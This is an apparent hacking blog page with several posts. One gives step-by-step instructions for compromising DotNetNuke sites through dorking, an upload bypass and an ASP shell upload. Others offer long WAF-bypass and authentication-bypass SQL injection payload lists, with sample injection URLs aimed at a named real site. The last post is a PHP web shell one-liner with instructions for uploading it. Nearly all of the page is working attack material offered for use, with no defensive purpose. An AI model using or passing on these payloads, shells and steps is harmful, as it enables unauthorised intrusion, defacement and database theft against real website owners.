Friday, August 28, 2015

DNN ( DotNetNuke ) Website Hacking


How To Hack Websites Using DotNetNuke Exploit + Shell Uploading
Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. B
y using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
What is DNN (Dot Net Nuke) ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Step 1: First go to google.com search page and use this following dork to find vulnerable site.
inurl:home/tabid/36/language/en-US/Default.aspx
another dorks you can use
inurl:fcklinkgallery.aspx
inurl:/portals/0
Step 2: Now open any site from the search list like
http://www.vulsite.com/…/tab…/36/language/en-US/Default.aspx
Now replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your url will become
http://www.vulsite.com/…/HtmlEditor…/Fck/fcklinkgallery.aspx
then hit enter
Step 3: Now there are 2 possibilities
if u get Link Gallery url select then site is not vulnerable , see the image below :
http://1.bp.blogspot.com/…/nGf…/s1600/website%2Bhacking1.jpg
and If you get Like shown in below image then target is vulnerable :
http://3.bp.blogspot.com/…/r3g…/s1600/website%2Bhacking2.jpg
ok now if you find a vulnerable site move to next step
Step 4: Now you can see 3 options there and we neeed to select “File in your site”.
http://3.bp.blogspot.com/…/29B…/s1600/website%2Bhacking3.jpg
Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .
Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.
http://2.bp.blogspot.com/…/dOg…/s1600/website%2Bhacking4.jpg
Step 7: Now you have to upload your shell.
Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg
So for this purpose first we need to upload a special type of shell which is specially coded in asp.
Download the shell :- goto www.sh3ll.org .
Now rename your asp shell to
yourshell.asp;.jpg
and upload it.
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
http://4.bp.blogspot.com/…/crr…/s1600/website%2Bhacking0.jpg
Step 8: Now upload your php shell using upload file option marked in above image.
After uploading php shell you can access it by going to this address,
http://www.vulsite.com/portals/0/yourphpshell.php
Step 9: Now replace your index.html with original index.html. Thats it.
Well you can also hack all sites which are hosted on same server.
For that follow the bellow image and click on Drives you will find all sites hosted on same server.
Click on any one site and follow the above process to upload you shell.
Happy website hacking!!!
—————————————-
# D4RK 4NG31
—————————————-
Posted by at No comments:

WAF Bypass Cheat Sheet


WAF Bypass Cheat Sheet

Union Select
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+?UnI?On?+'SeL?ECT?
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
/*union*/union/*select*/select+1,2,3/*
/*uniXon*/union/*selXect*/select+1,2/*
un/**/ion+sel/**/ect
+#1q%0Aunion all#qa%0A#%0Aselect
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!50000select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
/**//*!union*//**//*!select*//**/
/**/UNunionION/**/SELselectECT/**/
/**//*UnIOn*//**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
/**/UNunionION/**/all/**/SELselectECT/**/
/**//*UnIOn*//**/all/**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
uni
%20union%20/*!select*/%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se%6cect*/+
1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!select*/
%55nion %53elect
+?+Union+?+Select+?+
+UnIoN/*&a=*/SeLeCT/*&a=*/
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
union(select(1),2,3)
union (select 1111,2222,3333)
union (/*!/**/ SeleCT */ 11)
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*?*//*!all*//*?*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
id=1+?UnI?On?+?SeL?ECT?
id=1+?UnI?||?on?+SeLeCT?
union select 1?+%0A,2?+%0A,3?+%0A etc ?
/*!00000Union*/ /*!00000Select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Union Select  by PASS with Url Encoded Method:
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Cheat Sheet of Bypassing Of Order by And Group By


 order by/**_**/
/*!12345order*/ /*!12345by*/
) order by 1-- -
') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23




Concat And Group_concat By Pass cheat Sheet ::



/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)

How to By Pass Tables:::
group_concat(/*!table_name*/)

+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
How to By Pass Columns:::
group_concat(/*!column_name*/)
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


URL enCoded By passing Table and columns::
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

illegal mix of Collations ByPass ::

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
Posted by at No comments:

SQLi Authentication Bypass Cheat Sheet


or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Posted by at No comments:

Create Your CMD


We've to create CMD.. Let's Start . Follow these steps

1. Open Notepad

2. Paste this Code :
<?if($_GET['dark']){echo"<pre>".shell_exec($_GET["dark"]);}?>


3. Now Save it as with name "cmd.php"




4. Now upload it in website




5. Successfully Uploaded :))




6. Now we use this Command to test cmd is working or not. "cmd.php?dark=ls" where "cmd" is file name and "dark" is parameter and "ls" is to check how many files contain in current directory. If it's showing multiple files name then It means CMD is working.... :)))) 




Happy Hacking !






Hope You Like D4RK 4NG31 tutorial ;)























Posted by



at





No comments:
  


































        

      









Subscribe to:
Posts (Atom)